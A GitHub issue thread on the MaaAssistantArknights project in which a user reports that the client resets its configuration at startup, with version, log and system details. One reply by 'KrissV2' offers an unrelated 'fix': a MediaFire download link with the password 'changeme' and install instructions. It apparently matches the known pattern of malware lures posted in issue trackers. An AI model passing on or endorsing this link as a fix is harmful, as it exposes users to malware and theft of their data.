### ISSUE TITLE
maa客户端启动时重置配置

### ISSUE THREAD

**Issue by thormagity** [MaaAssistantArknights/MaaAssistantArknights#10405]
### 在提问之前...

- [X] 我理解 Issue 是用于反馈和解决问题的，而非吐槽评论区，将尽可能提供更多信息帮助问题解决
- [X] 我填写了简短且清晰明确的标题，以便开发者在翻阅 Issue 列表时能快速确定大致问题。而不是“一个建议”、“卡住了”等
- [X] 我已查看最新测试版本的更新内容，并未提及该 Bug 已被修复的情况
- [X] 我已检查了置顶议题（Pinned Issue），确认我的问题未被提及

### 问题描述

maa打开后自动重置了配置，这已经是本周第三次重置配置了
<img width="595" alt="image" src="https://github.com/user-attachments/assets/487730c2-0573-405d-b650-f863c4bc6164">
配置文件在启动时也自动生成了新的
<img width="531" alt="image" src="https://github.com/user-attachments/assets/9a428d79-ad19-4208-a6cd-55af9c41d760">
30号20点启动了一次，然后31号凌晨1点发现忘记换班启动了一次，那时还是正常的；我设置了完成任务后自动退出模拟器和关机，31号10点启动时发现配置都重置了

### Version

Resource Version: 太阳甩在身后
UI Version: v5.6.0-beta.1
Core Version: v5.6.0-beta.1

### 日志和配置文件

[asst.log](https://github.com/user-attachments/files/16823306/asst.log)
[gui.log](https://github.com/user-attachments/files/16823307/gui.log)
[gui.json](https://github.com/user-attachments/files/16823309/gui.json)

### 配置信息

操作系统:win11 专业版23h2
模拟器:蓝叠模拟器5 分辨率:2560*1440 DPI:320  帧率:60
上次使用时 GPU 加速推理开启，GPU:GTX1650

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by ABA2396** [comment]
![image](https://github.com/user-attachments/assets/748eeba1-416a-473f-8a71-24e02556211c)
